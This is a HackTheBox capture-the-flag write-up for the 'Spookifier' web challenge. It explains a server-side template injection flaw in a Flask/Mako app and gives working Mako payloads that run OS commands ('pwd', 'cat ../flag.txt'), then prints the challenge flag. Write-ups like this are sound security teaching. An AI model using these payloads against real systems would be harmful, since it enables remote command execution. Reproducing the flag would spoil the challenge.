Post

HackTheBox Challenge - Spookifier

HackTheBox Challenge - Spookifier

Banner

Description

There’s a new trend of an application that generates a spooky name for you. Users of that application later discovered that their real names were also magically changed, causing havoc in their life. Could you help bring down this application?

Solution

Since this is a web challenge, I began by browsing the target website provided.

Target Website

I typed the name as test, and in response, the website gave me the same output in four different fonts.

Name Spookifier

While checking the page source and Network Tab under DevTools, I didn’t find anything interesting.

The challenge itself contains some files that are necessary for the challenge. By inspecting the source code of the application, I found that the application is built using Flask in Python.

When a user submits the form, a GET request is sent to the root endpoint (/) with the submitted Halloween name passed as a query parameter (text).

The server handles this input by invoking a function called spookify, which then forwards it to another function responsible for formatting the output. The generate_render() function ultimately produces the final result, and its implementation is as follows:

routes.py

1
2
3
4
5
6
7
8
9
10
11
12
13
14
from flask import Blueprint, request
from flask_mako import render_template
from application.util import spookify

web = Blueprint('web', __name__)

@web.route('/')
def index():
    text = request.args.get('text')
    if(text):
        converted = spookify(text)
        return render_template('index.html',output=converted)
    
    return render_template('index.html',output='')

This Flask application uses Mako templates (flask_mako) and defines a route (/) that takes a query parameter text. If text is provided, it processes the input using the spookify function, which likely transforms the text into different fonts or styles. The transformed output is then passed to the index.html template via render_template.

While inspecting util.py, I came across code that transforms a given text into multiple font styles and returns an HTML-rendered table displaying the results. The spookify function first calls change_font, which converts the input text into different fonts using predefined font mappings (font1, font2, etc.). The transformed text is then passed to generate_render(), which formats it into an HTML table using Mako’s Template.render(). This setup allows a Flask web application to display the same text in various stylized fonts dynamically.

util.py

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
def generate_render(converted_fonts):
	result = '''
		<tr>
			<td>{0}</td>
        </tr>
        
		<tr>
        	<td>{1}</td>
        </tr>
        
		<tr>
        	<td>{2}</td>
        </tr>
        
		<tr>
        	<td>{3}</td>
        </tr>

	'''.format(*converted_fonts)
	
	return Template(result).render()

def change_font(text_list):
	text_list = [*text_list]
	current_font = []
	all_fonts = []
	
	add_font_to_list = lambda text,font_type : (
		[current_font.append(globals()[font_type].get(i, ' ')) for i in text], all_fonts.append(''.join(current_font)), current_font.clear()
		) and None

	add_font_to_list(text_list, 'font1')
	add_font_to_list(text_list, 'font2')
	add_font_to_list(text_list, 'font3')
	add_font_to_list(text_list, 'font4')

	return all_fonts

def spookify(text):
	converted_fonts = change_font(text_list=text)

	return generate_render(converted_fonts=converted_fonts)

The generate_render() function directly passes the user input into the template without any validation, which hints that the input field is vulnerable to Server-Side Template Injection (SSTI).

I will try a very simple mathematical expression ${7*7} in the input field and wait for the response.

Template Injection

The response is 49 which confirms that the application is vulnerable to SSTI.

As we have access to the source code, we know that the flag is stored in a file named flag.txt. To read the flag, we first need to determine the current working directory by executing the pwd command.

1
${__import__('os').popen('pwd').read()}

current directory

The output revealed that the current directory is /app, meaning we need to go up one level to access the flag.txt file.

1
${__import__('os').popen('cat ../flag.txt').read()}

Flag found

Flag -

1
HTB{t3mpl4t3_1nj3ct10n_C4n_3x1st5_4nywh343!!}

Pwned

Thanks for reading this far. If you enjoyed the writeup, do support me here.

This post is licensed under CC BY 4.0 by the author.